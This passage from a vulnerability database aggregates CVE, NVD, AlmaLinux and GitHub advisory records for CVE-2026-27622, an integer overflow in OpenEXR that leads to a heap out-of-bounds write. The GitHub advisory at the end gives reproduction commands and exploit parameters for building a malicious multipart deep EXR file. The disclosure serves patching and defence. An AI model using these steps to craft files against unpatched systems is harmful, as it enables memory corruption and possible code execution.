b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://access.redhat.com/errata/RHSA-2026:7682\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://access.redhat.com/errata/RHSA-2026:8863\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://access.redhat.com/errata/RHSA-2026:8869\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://access.redhat.com/errata/RHSA-2026:8870\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://access.redhat.com/errata/RHSA-2026:8871\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://access.redhat.com/errata/RHSA-2026:8872\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://access.redhat.com/errata/RHSA-2026:8888\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://access.redhat.com/security/cve/CVE-2026-27622\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://bugzilla.redhat.com/show_bug.cgi?id=2444251\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-27622.json\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-27622\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-04T16:06:34.211154Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-04T16:08:09.596Z\"}}], \"cna\": {\"title\": \"OpenEXR CompositeDeepScanLine integer-overflow leads to heap OOB write\", \"source\": {\"advisory\": \"GHSA-cr4v-6jm6-4963\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 8.4, \"attackVector\": \"LOCAL\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N\", \"userInteraction\": \"ACTIVE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"HIGH\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"HIGH\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"AcademySoftwareFoundation\", \"product\": \"openexr\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 2.3.0, \u003c 3.2.6\"}, {\"status\": \"affected\", \"version\": \"\u003e= 3.3.0, \u003c 3.3.8\"}, {\"status\": \"affected\", \"version\": \"\u003e= 3.4.0, \u003c 3.4.6\"}]}], \"references\": [{\"url\": \"https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963\", \"name\": \"https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. In CompositeDeepScanLine::readPixels, per-pixel totals are accumulated in vector\u003cunsigned int\u003e total_sizes for attacker-controlled large counts across many parts, total_sizes[ptr] wraps modulo 2^32. overall_sample_count is then derived from wrapped totals and used in samples[channel].resize(overall_sample_count). Decode pointer setup/consumption proceeds with true sample counts, and write operations in core unpack (generic_unpack_deep_pointers) overrun the undersized composite sample buffer. This vulnerability is fixed in v3.2.6, v3.3.8, and v3.4.6.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-787\", \"description\": \"CWE-787: Out-of-bounds Write\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-03T22:42:49.086Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-27622\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-11T03:56:39.168Z\", \"dateReserved\": \"2026-02-20T22:02:30.027Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-03T22:42:49.086Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
alsa-2026:7682
Vulnerability from osv_almalinux
Published
2026-04-13 00:00
Modified
2026-04-14 12:33
Summary
Important: openexr security update
Details
OpenEXR is an open-source high-dynamic-range floating-point image file format for high-quality image processing and storage. This document presents a brief overview of OpenEXR and explains concepts that are specific to this format. This package containes the binaries for OpenEXR.
Security Fix(es):
- openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing (CVE-2026-27622)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
References
{
"affected": [
{
"package": {
"ecosystem": "AlmaLinux:10",
"name": "openexr"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.1.10-8.el10_1.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:10",
"name": "openexr-devel"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.1.10-8.el10_1.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:10",
"name": "openexr-libs"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.1.10-8.el10_1.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"details": "OpenEXR is an open-source high-dynamic-range floating-point image file format for high-quality image processing and storage. This document presents a brief overview of OpenEXR and explains concepts that are specific to this format. This package containes the binaries for OpenEXR. \n\nSecurity Fix(es): \n\n * openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing (CVE-2026-27622)\n\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n",
"id": "ALSA-2026:7682",
"modified": "2026-04-14T12:33:23Z",
"published": "2026-04-13T00:00:00Z",
"references": [
{
"type": "ADVISORY",
"url": "https://access.redhat.com/errata/RHSA-2026:7682"
},
{
"type": "REPORT",
"url": "https://access.redhat.com/security/cve/CVE-2026-27622"
},
{
"type": "REPORT",
"url": "https://bugzilla.redhat.com/2444251"
},
{
"type": "ADVISORY",
"url": "https://errata.almalinux.org/10/ALSA-2026-7682.html"
}
],
"related": [
"CVE-2026-27622"
],
"summary": "Important: openexr security update"
}
alsa-2026:8863
Vulnerability from osv_almalinux
Published
2026-04-20 00:00
Modified
2026-04-30 07:37
Summary
Important: OpenEXR security update
Details
OpenEXR is a high dynamic-range (HDR) image file format developed by Industrial Light & Magic for use in computer imaging applications. This package contains libraries and sample applications for handling the format.
Security Fix(es):
- openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing (CVE-2026-27622)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
References
{
"affected": [
{
"package": {
"ecosystem": "AlmaLinux:8",
"name": "OpenEXR-devel"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.2.0-12.el8_10.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:8",
"name": "OpenEXR-libs"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.2.0-12.el8_10.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"details": "OpenEXR is a high dynamic-range (HDR) image file format developed by Industrial Light \u0026 Magic for use in computer imaging applications. This package contains libraries and sample applications for handling the format. \n\nSecurity Fix(es): \n\n * openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing (CVE-2026-27622)\n\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n",
"id": "ALSA-2026:8863",
"modified": "2026-04-30T07:37:50Z",
"published": "2026-04-20T00:00:00Z",
"references": [
{
"type": "ADVISORY",
"url": "https://access.redhat.com/errata/RHSA-2026:8863"
},
{
"type": "REPORT",
"url": "https://access.redhat.com/security/cve/CVE-2026-27622"
},
{
"type": "REPORT",
"url": "https://bugzilla.redhat.com/2444251"
},
{
"type": "ADVISORY",
"url": "https://errata.almalinux.org/8/ALSA-2026-8863.html"
}
],
"related": [
"CVE-2026-27622"
],
"summary": "Important: OpenEXR security update"
}
alsa-2026:8888
Vulnerability from osv_almalinux
Published
2026-04-20 00:00
Modified
2026-04-20 08:30
Summary
Important: openexr security update
Details
OpenEXR is an open-source high-dynamic-range floating-point image file format for high-quality image processing and storage. This document presents a brief overview of OpenEXR and explains concepts that are specific to this format. This package containes the binaries for OpenEXR.
Security Fix(es):
- openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing (CVE-2026-27622)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
References
{
"affected": [
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "openexr"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.1.1-3.el9_7.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "openexr-devel"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.1.1-3.el9_7.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "AlmaLinux:9",
"name": "openexr-libs"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.1.1-3.el9_7.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"details": "OpenEXR is an open-source high-dynamic-range floating-point image file format for high-quality image processing and storage. This document presents a brief overview of OpenEXR and explains concepts that are specific to this format. This package containes the binaries for OpenEXR. \n\nSecurity Fix(es): \n\n * openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing (CVE-2026-27622)\n\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n",
"id": "ALSA-2026:8888",
"modified": "2026-04-20T08:30:11Z",
"published": "2026-04-20T00:00:00Z",
"references": [
{
"type": "ADVISORY",
"url": "https://access.redhat.com/errata/RHSA-2026:8888"
},
{
"type": "REPORT",
"url": "https://access.redhat.com/security/cve/CVE-2026-27622"
},
{
"type": "REPORT",
"url": "https://bugzilla.redhat.com/2444251"
},
{
"type": "ADVISORY",
"url": "https://errata.almalinux.org/9/ALSA-2026-8888.html"
}
],
"related": [
"CVE-2026-27622"
],
"summary": "Important: openexr security update"
}
FKIE_CVE-2026-27622
Vulnerability from fkie_nvd - Published: 2026-03-03 23:15 - Updated: 2026-06-30 03:17
Severity
7.8 (High) - CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
7.4 (High) - CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
7.4 (High) - CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Summary
OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. In CompositeDeepScanLine::readPixels, per-pixel totals are accumulated in vector<unsigned int> total_sizes for attacker-controlled large counts across many parts, total_sizes[ptr] wraps modulo 2^32. overall_sample_count is then derived from wrapped totals and used in samples[channel].resize(overall_sample_count). Decode pointer setup/consumption proceeds with true sample counts, and write operations in core unpack (generic_unpack_deep_pointers) overrun the undersized composite sample buffer. This vulnerability is fixed in v3.2.6, v3.3.8, and v3.4.6.
References
{
"affected": [
{
"affectedData": [
{
"product": "openexr",
"vendor": "AcademySoftwareFoundation",
"versions": [
{
"status": "affected",
"version": "\u003e= 2.3.0, \u003c 3.2.6"
},
{
"status": "affected",
"version": "\u003e= 3.3.0, \u003c 3.3.8"
},
{
"status": "affected",
"version": "\u003e= 3.4.0, \u003c 3.4.6"
}
]
}
],
"source": "security-advisories@github.com"
},
{
"affectedData": [
{
"cpes": [
"cpe:/o:redhat:enterprise_linux_eus:10.0"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream EUS (v. 10.0)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/o:redhat:enterprise_linux:10.1"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream (v. 10)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:enterprise_linux:8::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream (v. 8)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_aus:8.2::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream AUS (v. 8.2)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_aus:8.4::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream AUS (v.8.4)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_eus_long_life:8.4::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream EUS EXTENSION (v.8.4)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_aus:8.6::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream AUS (v.8.6)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_e4s:8.6::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_tus:8.6::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream TUS (v.8.6)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_e4s:8.8::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream E4S (v.8.8)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_tus:8.8::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream TUS (v.8.8)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_e4s:9.0::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream E4S (v.9.0)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_e4s:9.2::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream E4S (v.9.2)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_eus:9.4::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_eus:9.6::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream EUS (v.9.6)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:enterprise_linux:9::appstream"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AppStream (v. 9)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/o:redhat:enterprise_linux:10.1"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:enterprise_linux:8::crb"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux CRB (v. 8)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_eus:9.4::crb"
],
"defaultStatus": "affected",
"product": "Red Hat CodeReady Linux Builder EUS (v.9.4)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhel_eus:9.6::crb"
],
"defaultStatus": "affected",
"product": "Red Hat CodeReady Linux Builder EUS (v.9.6)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:enterprise_linux:9::crb"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ai_inference_server:3.3::el9"
],
"defaultStatus": "affected",
"product": "Red Hat AI Inference Server 3.3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/o:redhat:enterprise_linux:6"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux 6",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/o:redhat:enterprise_linux_eus:10.0"
],
"defaultStatus": "unaffected",
"product": "Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unaffected",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
}
],
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c"
}
],
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:*",
"matchCriteriaId": "637078D8-68DE-478F-B304-A08E80A7609C",
"versionEndExcluding": "3.2.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:*",
"matchCriteriaId": "529003A0-284B-4A1F-B4FF-CABB9A7534B5",
"versionEndExcluding": "3.3.8",
"versionStartIncluding": "3.3.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:*",
"matchCriteriaId": "44066539-F7B6-415A-AE11-0F80BB8741D7",
"versionEndExcluding": "3.4.6",
"versionStartIncluding": "3.4.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. In CompositeDeepScanLine::readPixels, per-pixel totals are accumulated in vector\u003cunsigned int\u003e total_sizes for attacker-controlled large counts across many parts, total_sizes[ptr] wraps modulo 2^32. overall_sample_count is then derived from wrapped totals and used in samples[channel].resize(overall_sample_count). Decode pointer setup/consumption proceeds with true sample counts, and write operations in core unpack (generic_unpack_deep_pointers) overrun the undersized composite sample buffer. This vulnerability is fixed in v3.2.6, v3.3.8, and v3.4.6."
},
{
"lang": "es",
"value": "OpenEXR proporciona la especificaci\u00f3n y la implementaci\u00f3n de referencia del formato de archivo EXR, un formato de almacenamiento de im\u00e1genes para la industria cinematogr\u00e1fica. En CompositeDeepScanLine::readPixels, los totales por p\u00edxel se acumulan en vector total_sizes para grandes recuentos controlados por el atacante en muchas partes, total_sizes[ptr] se ajusta m\u00f3dulo 2^32. overall_sample_count se deriva entonces de los totales ajustados y se utiliza en samples[channel].resize(overall_sample_count). La configuraci\u00f3n/consumo del puntero de decodificaci\u00f3n procede con recuentos de muestras verdaderos, y las operaciones de escritura en el desempaquetado central (generic_unpack_deep_pointers) desbordan el b\u00fafer de muestras compuesto de tama\u00f1o insuficiente. Esta vulnerabilidad se corrige en las versiones v3.2.6, v3.3.8 y v3.4.6."
}
],
"id": "CVE-2026-27622",
"lastModified": "2026-06-30T03:17:56.343",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.4,
"impactScore": 5.9,
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"type": "Secondary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "LOCAL",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 8.4,
"baseSeverity": "HIGH",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "ACTIVE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "security-advisories@github.com",
"type": "Secondary"
}
],
"ssvcV203": [
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"ssvcData": {
"id": "CVE-2026-27622",
"options": [
{
"exploitation": "none"
},
{
"automatable": "no"
},
{
"technicalImpact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-03-10T00:00:00+00:00",
"version": "2.0.3"
}
}
]
},
"published": "2026-03-03T23:15:55.737",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963"
},
{
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"url": "https://access.redhat.com/errata/RHSA-2026:12338"
},
{
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"url": "https://access.redhat.com/errata/RHSA-2026:12339"
},
{
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"url": "https://access.redhat.com/errata/RHSA-2026:12340"
},
{
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"url": "https://access.redhat.com/errata/RHSA-2026:12341"
},
{
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"url": "https://access.redhat.com/errata/RHSA-2026:16008"
},
{
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"url": "https://access.redhat.com/errata/RHSA-2026:16009"
},
{
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"url": "https://access.redhat.com/errata/RHSA-2026:16030"
},
{
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"url": "https://access.redhat.com/errata/RHSA-2026:16174"
},
{
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"url": "https://access.redhat.com/errata/RHSA-2026:7678"
},
{
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"url": "https://access.redhat.com/errata/RHSA-2026:7682"
},
{
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"url": "https://access.redhat.com/errata/RHSA-2026:8863"
},
{
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"url": "https://access.redhat.com/errata/RHSA-2026:8869"
},
{
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"url": "https://access.redhat.com/errata/RHSA-2026:8870"
},
{
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"url": "https://access.redhat.com/errata/RHSA-2026:8871"
},
{
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"url": "https://access.redhat.com/errata/RHSA-2026:8872"
},
{
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"url": "https://access.redhat.com/errata/RHSA-2026:8888"
},
{
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"url": "https://access.redhat.com/security/cve/CVE-2026-27622"
},
{
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444251"
},
{
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-27622.json"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-787"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-190"
}
],
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"type": "Secondary"
}
]
}
GHSA-CR4V-6JM6-4963
Vulnerability from github – Published: 2026-03-02 18:30 – Updated: 2026-03-04 02:00
VLAI
Summary
OpenEXR's CompositeDeepScanLine integer-overflow leads to heap OOB write
Details
Summary
Function: CompositeDeepScanLine::readPixels, reachable from high-level multipart deep read flows (MultiPartInputFile + DeepScanLineInputPart + CompositeDeepScanLine).
Vulnerable lines (src/lib/OpenEXR/ImfCompositeDeepScanLine.cpp):
- total_sizes[ptr] += counts[j][ptr]; (line ~511)
- overall_sample_count += total_sizes[ptr]; (line ~514)
- samples[channel].resize (overall_sample_count); (line ~535)
Impact: 32-bit sample-count accumulation wrap leads to undersized allocation, then decode writes with true sample volume, causing heap OOB write in generic_unpack_deep_pointers (src/lib/OpenEXRCore/unpack.c:1374) (DoS/Crash, memory corruption/RCE).
Attack scenario:
- Attacker provides multipart deep EXR with many parts and very large sample counts per pixel.
- Uses compression (RLE/ZIPS) to keep file size relatively small vs decode pressure.
- The overflow happens in composite sample accounting (unsigned int), while pointer progression for decode uses larger counters and reaches out-of-bounds.
Tested on: OpenEXR 4.0.0-dev (commit 83449669402080874b25ff1fa740649a9e6ea064) but this code has existed since v2.3.0
Steps to reproduce
composite_deepscanline_poc_bundle.patch
PoC files used:
- Writer/generator: poc/composite_deep_scanline_e2e_compressed_poc.cpp
- Minimal high-level reader harness: poc/simple_exr_reader.cpp
The reader harness intentionally mimics realistic app behavior: open EXR, iterate parts, select DEEPSCANLINE, add sources to CompositeDeepScanLine, bind a normal FrameBuffer, then call readPixels.
Build with ASAN/UBSAN:
cmake -S . -B build-asan \
-DOPENEXR_BUILD_POC=ON \
-DCMAKE_BUILD_TYPE=RelWithDebInfo \
-DCMAKE_C_FLAGS='-fsanitize=address,undefined -fno-omit-frame-pointer' \
-DCMAKE_CXX_FLAGS='-fsanitize=address,undefined -fno-omit-frame-pointer' \
-DCMAKE_EXE_LINKER_FLAGS='-fsanitize=address,undefined' \
-DCMAKE_SHARED_LINKER_FLAGS='-fsanitize=address,undefined'
cmake --build build-asan --target composite_writer simple_exr_reader -j
Generate malicious file (decode-path focused profile):
ASAN_OPTIONS=detect_leaks=0 timeout 180s \
./build-asan/poc/composite_writer \
--profile low-ram \
--file /tmp/composite_decode_focus.exr
Trigger:
ASAN_OPTIONS=detect_leaks=0 timeout 30s \
./build-asan/poc/simple_exr_reader /tmp/composite_decode_focus.exr
ASAN builds are slower. If needed, a non-sanitized build + debugger is faster for iteration.
Example runs
Writer (abbrev):
❯ ./build-asan/poc/composite_writer
exploit math:
benign samples : 300
malicious parts : 86
malicious samples per part : 50000000
true total samples : 4300000300
uint32 overflow reached : yes
wrapped uint32 total : 5033004
composite Z/A alloc from wrap : 40264032 bytes (38.40 MiB)
per-part unpacked sample bytes : 300000000 bytes (286.10 MiB)
min parts to overflow (current benign/samples): 86
writing compressed multipart deep EXR: /tmp/composite_deep_scanline_e2e_compressed.exr
writing donor malicious part (50000000 samples)
copying malicious part 1/86 from donor chunk
...
file size: 26112896 bytes (24.90 MiB)
